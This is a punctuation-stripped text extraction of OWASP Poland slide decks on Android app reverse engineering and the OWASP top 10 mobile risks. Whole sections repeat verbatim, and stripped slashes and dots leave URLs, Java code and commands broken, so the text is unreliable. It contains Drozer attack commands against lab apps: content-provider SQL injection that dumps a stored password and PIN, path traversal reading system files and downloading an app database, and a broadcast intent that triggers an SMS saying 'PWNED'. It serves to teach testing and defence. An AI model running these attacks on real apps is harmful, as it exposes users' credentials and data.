bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
